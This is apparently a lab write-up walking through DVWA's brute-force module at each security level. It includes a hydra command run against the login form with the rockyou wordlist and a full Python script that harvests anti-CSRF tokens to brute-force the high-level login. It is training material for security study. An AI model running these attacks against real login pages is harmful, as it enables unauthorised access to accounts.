In this walk through, we will be going through the Bruteforce vulnerability section from DVWA Labs. We will be exploring and learn about Bruteforce attacks and what makes an application vulnerable to it. We will start with the security level as Low and will gradually increase the difficulty as we progress further. So, let’s get started with the Hacking without any delay.
Table of Contents
Bruteforce Attacks:
Bruteforce attack is an attack where an attacker tries to guess every possible password combinations in order to gain access to an authenticated system. It typically involves Dictionary based attacks where a wordlist of possible dictionary words and common passwords is generated and then checked against a bunch of potential usernames in hope of getting access. The bruteforce attack is an attack which will be successful eventually but the success depends on various factors like password length, password complexity and system lockouts.
Security: Low (Bruteforce)
- Starting with the security level as low. We have a login panel where a username and password combination is expected in order to get in.
- I tried common credentials like – admin:123
- Next, used the admin:password and got in. Quite easy.
Security: Medium (Bruteforce)
- For the medium level, Capturing the request via Burpsuite. We can two parameters – username and password in the GET request.
- Next, i used hydra to bruteforce the login using rockyou.txt. Remember to add the cookies where you have already authenticated.
sudo hydra -l admin -P ~/Desktop/Wordlist/rockyou.txt localhost http-get-form "/vulnerabilities/brute/:username=^USER^&password=^PASS^&Login=Login:H=Cookie:PHPSESSID=2v14onb9bcasu8cc7ge73n9en7; security=medium:F=Username and/or password incorrect"
Security: High (Bruteforce)
- I have set the security to High and enabled the PHPIDS for this one.
- Captured the request via Burpsuite. Found out that this time the application is using a CSRF token along side the request.
- The token is changing for every request. Tried common bypasses like changing the token value, removing the token value and sending it blank, removing the user_token parameter all together and changing request method from GET to POST. But it didn’t work.
- Looked into the source code. Found out that the the application is generating CSRF Token for each request which is mandatory for the request and is passed alongside the cookie. If it failed to do so. I was getting a 302 Moved status code for both the correct and incorrect password.
- I noticed a field user_token in the page source code. By refreshing the page found out the Anti-CSRF token is being generated here.
- To extract the Anti-CSRF token, i write a proof of concept using python and we are able to grab the unique tokens.
from urllib.request import urlopen from bs4 import BeautifulSoup html = urlopen('http://localhost') bsObj = BeautifulSoup(html) input_tag = bsObj.find(attrs={"name": "user_token"}) usertoken = input_tag['value'] print(usertoken)
python3 main.py
- Now included this in a bruteforce script which takes the token and bruteforce the login.
from sys import argv import requests from bs4 import BeautifulSoup as Soup # give our arguments more semantic friendly names script, filename = argv txt = open(filename) # set up our target, cookie and session url = 'http://127.0.0.1/vulnerabilities/brute/' success_message = "Welcome to the password protected area admin" cookie = {'security': 'high', 'PHPSESSID': 'o8a7cb27uaonjb5b9oe5csnv30'} s = requests.Session() target_page = s.get(url, cookies=cookie) ''' checkSuccess @param: html (String) Searches the response HTML for our specified success message ''' def checkSuccess(html): # get our soup ready for searching soup = Soup(html, features="html.parser") # check for our success message in the soup search = soup.findAll(string=success_message) if not search: success = False else: success = True # return the brute force result return success # Get the initial CSRF token from the target site page_source = target_page.text soup = Soup(page_source, features="html.parser") csrf_token = soup.findAll(attrs={"name": "user_token"})[0].get('value') # Display before attack print('DVWA URL: ' + url) print('CSRF Token: ' + csrf_token) # Loop through our provided password file with open(filename) as f: print('Running brute force attack...') for password in f: # Displays password tries and strips whitespace from password list print('[*] Checking password: ' + password) password = password.strip() # setup the payload payload = {'username': 'admin', 'password': password, 'Login': 'Login', 'user_token': csrf_token} r = s.get(url, cookies=cookie, params=payload) success = checkSuccess(r.text) if not success: # if it failed the CSRF token will be changed. Get the new one soup = Soup(r.text, features="html.parser") csrf_token = soup.findAll(attrs={"name": "user_token"})[0].get('value') else: # Success! Show the result print("[+] Found Password: " + password) break # We failed, bummer. if not success: print("[-] Brute force failed. No matches found.")
python3 bruteforce.py ~/Desktop/Wordlist/rockyou.txt
Security: Impossible (Bruteforce)
- Setting the security level to Impossible and PHPIDS as enabled.
- Captured the request via Burpsuite.
- There is a fucking timeout with this one and i am unable to find any solution for this yet. There is no parameter in the request that can be manipulated and the timeout is 15 minutes. So, we cannot realistically perform the bruteforcing here.
Also Read: Tryhackme – Team
Conclusion:
So, we finally completed all the security levels for the DVWA Bruteforce Vulnerability. We looked into the various ways how application has been set up in various levels and how we can bypass the security controls implemented. Next, we can mitigate the potential bruteforce attacks by enforcing strong password policy and implementing lockout mechanisms. On that note, i will take your leave and will meet you in next one with another DVWA vulnerability writeup, till then “Keep Hacking”.